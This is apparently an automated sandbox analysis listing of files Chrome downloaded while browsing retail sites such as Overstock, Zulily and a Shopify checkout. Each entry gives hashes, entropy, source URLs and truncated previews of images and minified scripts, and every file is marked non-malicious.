                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P............................................................................................ >i.....t<..d.q0{L.9......@P............1........................!1.Aq."Qa..2@...#CRS...........?...nH........}6...g.Q...b6
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (13953)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14033
                                                                                                                                                                                    Entropy (8bit):5.601470180964666
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:cdoYT0bI0KUiOmx1xIi/UDZGhU7jRPz3kQ3AF:cdoYc3KtNxjP6Y2Rr3kmAF
                                                                                                                                                                                    MD5:5D36171932959461CCA408DD301231DE
                                                                                                                                                                                    SHA1:DA69F437F2D096FA231822C859B3C9C0E5541111
                                                                                                                                                                                    SHA-256:A9B8A9FA53615F63F7F38CE8116CBD2FEBC43C5D68C9E1BC00AB35851D263BD3
                                                                                                                                                                                    SHA-512:DFA0F888773E96824A06079FCE3311898CCD77AA8951E7F0A3441D7ECAFB2E359FB2B67F74F09666A534299001EE2B827174DAF85E6E836B86C089E4B5F5DECE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/310.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[310],{30310:(s,e,t)=>{t.d(e,{c:()=>S});var r=t(60756),i=t.n(r),a=t(84960),o=t.n(a),n=t(96631),l=t.n(n),p=t(43688),c=t.n(p),d=t(760),h=t.n(d),u=t(85668),m=t(6880),f=t(75224),g=t(48812),b=t.n(g),v=t(77e3),I=["iconInputId","onClickRating","onIconKeyDown","isRequired","onMouseEnter","filledPercent","label","children","accessible"];function y(s){var e=u.useRef((0,m.i0)()),t=s.iconInputId,r=s.onClickRating,i=s.onIconKeyDown,a=s.isRequired,o=s.onMouseEnter,n=s.filledPercent,l=s.label,p=(s.children,s.accessible),c=b()(s,I);return(0,v.jsxs)("span",{children:[(0,v.jsx)("input",{id:e.current,name:t,className:"sr-only",onClick:r,onKeyDown:i,"aria-describedby":c["aria-describedby"],required:!!a||void 0,type:"radio"}),(0,v.jsxs)("label",{htmlFor:e.current,onMouseMove:o,className:"pr-interactive-star-icon",children:[(0,v.jsx)(f.Q,{size:50,filledPercent:n,accessible:p}),(0,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2296
                                                                                                                                                                                    Entropy (8bit):7.273347738133218
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:gIl/XflfeEneUcZi+WEuwHPeDj0E5Ae9NRfu:gIl/X1nTcZb+8WDL9NY
                                                                                                                                                                                    MD5:48B8E4105816362F031C533C73F0D702
                                                                                                                                                                                    SHA1:FA5246B2A6DD3932DC34B1B9A9FA9A4E5381002B
                                                                                                                                                                                    SHA-256:5724ADB7395114747E172690730B767BAB794CCB70924FAEDDD5098DF3148EC0
                                                                                                                                                                                    SHA-512:9275E58A25BE4FE01566597D26BB153087FF8C6D82108A580F28931F0BAC9151B4A81AFF8A01F201E2A6AD535A864DB5BF6DA96A84CF5DCB96A7F78E24FA809F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_9212212f-39d6-4c0d-846d-bf08e1e8db25.jpg?v=1729322978&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 `...P....*P.P.>1..C"!!.*.. ...1$.^.<0xNK.:p..p..7........../....P...............F......~...m.(.xz....o`...>..||..".M.e.l+|S./.\o.l*....ul3..il....N...!..`Ltp.HNu..f.v4.. ..B.p.L.=..!....d...........s......n...S.u.....V.!.@.....8...f.k....*8p....|?...L.~.3dl...d+....pNi.I2....%cF.....8...zo...../8....c..|r7b..u..l....2..5C.c:...l-.J..GL.P. .1.|.. .~....6........~..l...4..7.P......A.k......C..........Y.J{...U."e...*}<,z...1b....l{C..!..b.^.V..Yw.[.m...3..Z.KJ'Nyw...Yn.Pf......~"w.kP...&+.@.8.K7.?o.p~.t...a-\.5;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 480x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):27052
                                                                                                                                                                                    Entropy (8bit):7.993238999452123
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:C0CItkdkLcZ6444sTT0XIMCgL5BJchM75JN:7C3dkge4sHKJB5c6N
                                                                                                                                                                                    MD5:7DBABCCAE2047F5D10295D8C8FCC5049
                                                                                                                                                                                    SHA1:0073B723525AB24574FE187726DB927E1D52DF36
                                                                                                                                                                                    SHA-256:A8EA45F67E56EFFEB8C8D6AB5A60BBC6FCF6FDB5F9EF7950EBC81A7E3FC28D6C
                                                                                                                                                                                    SHA-512:482A3306F3C0D2A5F01BF5CC8485F132DAE9F819F68FA927D6C80977ADFD7D8B68891E8581E8E7E0B85E88F133B00343B972658ED83C50FC307624E3A9784080
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/e800570cf365c54c71508bc34d57a3b571160a56/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set.jpg?imwidth=480&impolicy=medium
                                                                                                                                                                                    Preview:RIFF.i..WEBPVP8 .i..P....*....>.F.J........p..c..L......Q..A./...\..h?..'....%.....=b.f.m...{..W..9..^...o..|.........?.W...........l.].$...O5..f...........|?........^............>......-..........!...C=.GB....dG.'..+.zL{.<U......{...'ao....c.r..O..s.r.r.(|.I.Y..C.%......zg.K...O.n...'..Y&zy.O..6,4M..'...:,....@.#...((...+9.U.+.P...*L...f).....,...4......4.Q....UX3.l..9....1.._.[kx....Qh..k.?3..w.5.}.?.....}gZ.J...E.../..|5..vK..ky..k.Fo*..`|2.-1....~...`.m....?X.K...*...\.6sn..\........./}.<....QWg.......3N3].........dU....R&.E...o.K.X0]....F...Y..0fw....o....R.m...7...W..KH......-0.... ....c........!.0....w.q.(.aU:a..k.!../..n.aC....0..%...l..(>..l.=g$9.m....x../.>....*..%ikZH..!...=lq!.2c..o..,...P..0..`..yg....\u.rW.+R..%z.@.......m`s.d.F....cz..W..\.'*..cP..[.n.[..@.Nn.S.......V._.....R;.F9...d%0..\.C.]/.&..:..Z.....M.....)=.v.s....(..sM...w7....>*.i..h...m.!.y.lCL.c.!V....F~..y;..;t.p..l.F.rU.5Wy..\A.4.g\.n.h..).\..#.n.=D..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1034)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1035
                                                                                                                                                                                    Entropy (8bit):5.012195257175598
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:IHvraY2CDcYpAJrYwBQLWxwyHo39MOo4/4+FnZWyLWss5:q2CjpAJkO/aMOD/5y
                                                                                                                                                                                    MD5:FEBA970738E534FD43162CFB19D41952
                                                                                                                                                                                    SHA1:FAA9D5B4AC3ED55A1A420DE50AC1D1595B6CA585
                                                                                                                                                                                    SHA-256:FC3577CA402B2AE1AD90260A383062510963F599FB68D969DA0D1486AE5FD5BE
                                                                                                                                                                                    SHA-512:AEBB5A73D2869068F93C0CB9D20A09330E6D2B3E0D8B2D2615D66924769D650FDB39E3AF068A33274AC1AD1B21EFA703AFA4F85408144F900629710DE2DE97B2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/Rollup.o9Mx-fKL.css
                                                                                                                                                                                    Preview:[dir=ltr] ._7Vwjr{text-align:left}[dir=rtl] ._7Vwjr{text-align:right}._7Vwjr{position:relative;line-height:var(--x-spacing-large-200);transition:opacity var(--x-duration-fast) var(--x-timing-ease-out)}.tq3Uk{padding-top:var(--x-spacing-small-400)}.oNgGT{transition:opacity var(--x-duration-fast) var(--x-timing-ease-out)}.n5gP0{font-weight:var(--x-typography-primary-weight-base);font-size:var(--x-typography-size-default)}.n5gP0>button:focus-visible{outline:none;border-radius:var(--x-global-border-radius, var(--x-border-radius-base))}.n5gP0>button:active .wSTmt span,.n5gP0>button:focus-visible .wSTmt span{color:var(--x-default-color-accent)}@media (hover: hover){.n5gP0:hover .wSTmt span{color:var(--x-default-color-accent)}}.n5gP0 span._7tqW8{margin-top:calc(var(--x-spacing-base) * -1)}@media screen and (min-width: 1000px){.gxa2t{border-radius:var( --x-control-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) );background-color:var( --x-default-color-accent-foregrou
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.745542787113981
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfkbCLdv3Af18lLMq/qLhGqjtALoOvCLXw9LxAeLNpGLtAVL2BqILV:YBQCLSWlLiLXtAL3aLA9LxvLNkLQL2BZ
                                                                                                                                                                                    MD5:F336E3D8CA0506B893234F0E16EEA0B4
                                                                                                                                                                                    SHA1:9209A345D8C217F8CAF8E8AAFC3B968BD1DC0A52
                                                                                                                                                                                    SHA-256:2C57BCE932F79CEB398541E8079EADA3EEC685499E6A8B918BEA2DA19ED66CDF
                                                                                                                                                                                    SHA-512:0791038507F86646D481B8FAE6679CF35CED406520415ED7F12ADC963349248C90FF80945ADDAB177DC3A14C37318F8A39B878AF256C183B549CAAD2F10FCB49
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/9621326%2C36369010%2C35804400%2C26420760%2C34117129%2C39904157%2C37938467%2C33095218%2C36208089%2C37000327/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33095218","rollup":{"average_rating":4.66,"rating_count":35,"review_count":35,"answered_questions":0}},{"page_id":"34117129","rollup":{"average_rating":4.53,"rating_count":45,"review_count":45,"answered_questions":0}},{"page_id":"35804400","rollup":{"average_rating":4.47,"rating_count":36,"review_count":36,"answered_questions":0}},{"page_id":"36369010","rollup":{"average_rating":4.07,"rating_count":57,"review_count":57,"answered_questions":0}},{"page_id":"36208089","rollup":{"average_rating":4.32,"rating_count":87,"review_count":87,"answered_questions":0}},{"page_id":"37000327","rollup":{"average_rating":3.91,"rating_count":58,"review_count":58,"answered_questions":0}},{"page_id":"37938467","rollup":{"average_rating":4.9,"rating_count":20,"review_count":20,"answered_questions":0}},{"page_id":"39904157","rollup":{"average_rating":4.92,"rating_count":13,"review_count":13,"answered_questions":0}},{"page_id":"9621326","rollup":{"average_rating":4.39
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):63548
                                                                                                                                                                                    Entropy (8bit):5.513992669525927
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIc:qYW2Pj5yO7t2ACRg83984zo
                                                                                                                                                                                    MD5:0B3AA139FB0B091A43C7BC50F6CB3BBF
                                                                                                                                                                                    SHA1:04686CC4BB3A7FD4D0C748A4409C610E9548897B
                                                                                                                                                                                    SHA-256:0060A5C23A9B264CB43004135839FFF956C9B79EAB5742447E67DFEB9368144E
                                                                                                                                                                                    SHA-512:2C1E5D73F55A48CA782B76983FE734E7FBC43D43FBF6E2FF89268D527E18727BCEC082368B45F4F6F934B6D73116B7C8BA8C36A14BF904C1AA36761486668C99
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/collections/furniture
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2182)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):53987
                                                                                                                                                                                    Entropy (8bit):5.09446484052787
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:4bwO1LkREvp9GqiCgtIB5XDaN6OmWm2Hv8WXWzWjWTWDWTWsWFWeoJDjYaZrm5Yg:NOmREvpIqiRtsoHcYaZrmyW
                                                                                                                                                                                    MD5:FBF77755508BA63B8C987567487923F9
                                                                                                                                                                                    SHA1:748BD9416954B8F5E0756D386E04BC371B1375ED
                                                                                                                                                                                    SHA-256:6E4C10ABDF66AF93891787E23E3BD8AAFAA30ECE3D72AF5A3178D62CFF803067
                                                                                                                                                                                    SHA-512:8AADDE42321E89EF704B9C5FB2E265D88FDD86EE9FEC019F498872818DB7222E3B69A1D0655602589D0440E8912410C775CCC9A565E72920E4D49C438707E1AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/search?section_id=template--16930125217951__recommendations&limit=8&q=id:9284591747231+OR+id:9284335337631+OR+id:9284098752671+OR+id:9258907107487+OR+id:9284117201055+OR+id:9413677908127+OR+id:9283966795935+OR+id:9283969450143&resource_type=product
                                                                                                                                                                                    Preview:<section id="shopify-section-template--16930125217951__recommendations" class="shopify-section cc-product-recommendations"><link href="//www.overstock.com/cdn/shop/t/224/assets/product.css?v=81253555964418955201730157903" rel="stylesheet" type="text/css" media="all" />.<product-recommendations class="section" . data-search-url="/search?section_id=template--16930125217951__recommendations&limit=8" . data-limit="8". data-url="/recommendations/products?section_id=template--16930125217951__recommendations&product_id=&limit=8&intent=related" . data-product-id=""><div class="container">. <h2 class="h4 section__heading text-start">Similar items</h2>. </div><carousel-slider class="carousel block" inactive>. <div class="container relative">. <div class="slider" id="slider-template--16930125217951__recommendations"><div class="container products-grid-container">. <ul class="slider__grid grid grid-flow-col auto-cols-2 small-cards-mobile md:auto-cols-3 lg:auto-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1495)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1597
                                                                                                                                                                                    Entropy (8bit):5.012272997831327
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:5tRr/iWIBotO/Afiqu7ihq0qfDlmRw7nAwEa+Sjgb0QM9xJGeedxNnp:XmuiyJWEwEaRcABGe6xNnp
                                                                                                                                                                                    MD5:B7D56C30CA4264AB2F5505AD6808C1DF
                                                                                                                                                                                    SHA1:70077A45797919FAA7D78DD86FE2DCF808E9DBB5
                                                                                                                                                                                    SHA-256:2EB89DEAF41C490FF58970D4793755ACFD9938C4B51349877CF08FC3637AA10F
                                                                                                                                                                                    SHA-512:36E3A86D9526411C6D52C9358945911DEB1F07A18575B9C1E7EA5A6A39451B717BFB3954B7E84BF4797FD873C69AE912E7598A01D7F0E8D95FFA1360C24BF9BD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/animate-on-scroll.js?v=15249566486942820451730157903
                                                                                                                                                                                    Preview:if(document.body.classList.contains("cc-animate-enabled"))if("IntersectionObserver"in window&&"MutationObserver"in window){const initAnimateOnScroll=()=>{const animatableElems=document.querySelectorAll("[data-cc-animate]:not(.cc-animate-init)");if(animatableElems.length>0){const intersectionObserver=new IntersectionObserver((entries,observer)=>{entries.forEach(entry=>{entry.isIntersecting&&!entry.target.classList.contains("cc-animate-in")&&(entry.target.classList.add("cc-animate-in"),observer.unobserve(entry.target))})});animatableElems.forEach(elem=>{elem.dataset.ccAnimateDelay&&(elem.style.animationDelay=elem.dataset.ccAnimateDelay),elem.dataset.ccAnimateDuration&&(elem.style.animationDuration=elem.dataset.ccAnimateDuration),elem.dataset.ccAnimate&&elem.classList.add(elem.dataset.ccAnimate),elem.classList.add("cc-animate-init"),intersectionObserver.observe(elem)})}},aosMinWidth=getComputedStyle(document.documentElement).getPropertyValue("--aos-min-width")||"0",mq=window.matchMedia(`(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (55677)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):144274
                                                                                                                                                                                    Entropy (8bit):5.60784601692848
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:2g3I8CpCbrSoU/6fyi23p7fRCfSthQ1wum3eqpt:2g2pCbrSoe6fyiE93uE
                                                                                                                                                                                    MD5:FE87F1DC1C42EBE03D5EFF6253644CD7
                                                                                                                                                                                    SHA1:E7AD36DFB1458D0E4D70880B8CEC277E4C312C68
                                                                                                                                                                                    SHA-256:A36DB08CF2DB6F6D695F147DD976D0FC3F36F001B22EE0890FAA113D3CAA41BF
                                                                                                                                                                                    SHA-512:B01A6F1813F64B912FF2058B32B559992185858067D8FB63D2642F0248958F932EF12D6F7A55FDAD1B77D426AB589389F0C9F0D9A13F8C8203D0C22369A33D0B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/VaultedPayment.CwzLhAxg.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-PayPalExpressPaymentMethod.zHPDBYl8.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","useIsOriginatedFromShop.7toB9y1y.js","useShowShopPayOptin.cjqea2Mu.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css"])))=>i.map(i=>d[i]);.import{e as k,c0 as le,at as Y,a as t,a8 as Q,ac as p,e5 as nt,jp as xe,az as F,bZ as Vn,b_ as Na,fm as on,hU as wt,pn as Fa,he as Ba,h as T,I as pe,bS as Ke,po as Pr,a6 as Et,aa as G,ab as ee,jw as Oe,pp as Da,E as Lt,lq as de,y as L,bf as Se,jJ as Ar,js as Sr,m as Ce,eU as qa,je as ln,av as qe,a3 as Ve,a4 as ie,jq as rt,mk as wr,gj as Er,bv as Ra,al as cn,v as at,J as Ie,A as ce,pq as Oa,dF as Mr,fD as Tt,pr as Va,g7 as za,lk as dn,T as K,ps as Ha,pt as Wa,pu as Ya,ia as zn,ej as Ga,lY as $a,lV as un,pv as Ua,mM as ja,pw as Za,et as Ka,a5 as xt,mA as Xa,d as X,fB as Ir,bT as Nt,a7 as re,aG as Xe,V as ae,mB as mn,D as ue,px as Ue,q as V,c7 as kr,c8 as Ja,py as Qa,cq as es,aO as pn,ae as st,bJ as
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):533
                                                                                                                                                                                    Entropy (8bit):4.933115570682282
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:X5eNcBWFXMOYEBAP5egtIzVWRwHjXJqIK+qIKzg0fUsq5eK:pemBkXWegazdDZq3+q3c08sceK
                                                                                                                                                                                    MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                                    SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                                    SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                                    SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://accounts.google.com/gsi/style
                                                                                                                                                                                    Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1756
                                                                                                                                                                                    Entropy (8bit):6.549970947994832
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZY+tVj24GTFHlH2MZE4vBHrcpGMN0HbYDaUBTXU6:NBIl/XflVxbtQ9FWcv9LMN0+fa6
                                                                                                                                                                                    MD5:F0FEBD7DF8AA686A0E7266F2DDE97558
                                                                                                                                                                                    SHA1:CBC110F2E9D7DB3401A1A677A11AB78E7A2D135F
                                                                                                                                                                                    SHA-256:5BEF81BE6C2D2DD813B1052206C4FFA0F0922A6A44BA397F3E71DAC582C910BF
                                                                                                                                                                                    SHA-512:D170138A993770B9D78E456FC1F280DBC89F0052907DA5958A8950ED80B4E3BEFA72FA1EAE0105B640017E41CCCC2E6BF537701ABE1640E78711396F80CF5866
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P................................................................................`.............:.,.Y.~.Fk....;,/..K..J...:+.5,+...H..,..........y.Y........cW....gt....K.1.H*^}$..........P{N.@...?...<...............
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1874
                                                                                                                                                                                    Entropy (8bit):7.0188375341754465
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:nIl/XflYWqJs0Z0gF1zaT9ulVBZlBG8VeP:nIl/X+Wqi+0gLzaJUVBZfa
                                                                                                                                                                                    MD5:44F22F4DCCBE41B05B8E6F8CA3B99C69
                                                                                                                                                                                    SHA1:FE312BE3E6338657ABDA43B4981BDB7BCC0E8B21
                                                                                                                                                                                    SHA-256:FC19CCEF443362B48BEAA23B09A7145832568D7F72117624D08F33EA973B633F
                                                                                                                                                                                    SHA-512:7AD31CA548FEE39818BBADD38985F1C918AE64160441A6106D559BFFE0DF0FB3C4A124315CF015707263685D1DEC1F72EE8AD38BB2F71553FB8E5933726CB21B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/files/floral_2x_6db7a3cd-9a85-43a1-904d-f99d4afe9857.png?crop=center&height=32&v=1720715379&width=32
                                                                                                                                                                                    Preview:RIFFJ...WEBPVP8X....8.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH......k..=.}..m.6[.,m...4*'._.JiTN~..........d.a.....R. .....a]D.....z.tVO`..q.(C.....")Z.EZ.&B.....9!'J..........@..K>+-."J>HR.. 28(yg.)*.%g........*..ERT.Z...T....[.H%L...&.1!?....".....1n.*)Y..:..+a./.`0.B2A?:...(....j..w.J8H....b2....)......DR.......B..TY[.....).....Qb...T.d...a.E..y.b:Qr^r.a.a.[I.R".!..b..........k..+'J..6..9..`.j.v.|.IY..... ...8.Y.z.4...8B.{.R?O.A..>-.......VP8 $........* . ....%..t......W.3.....u1..FoS...?P......{....................G.C...4_.~O......O.@~.....7..K>}.z.........s.i
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):58876
                                                                                                                                                                                    Entropy (8bit):5.405683338218142
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                    MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                    SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                    SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                    SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://static.ads-twitter.com/uwt.js
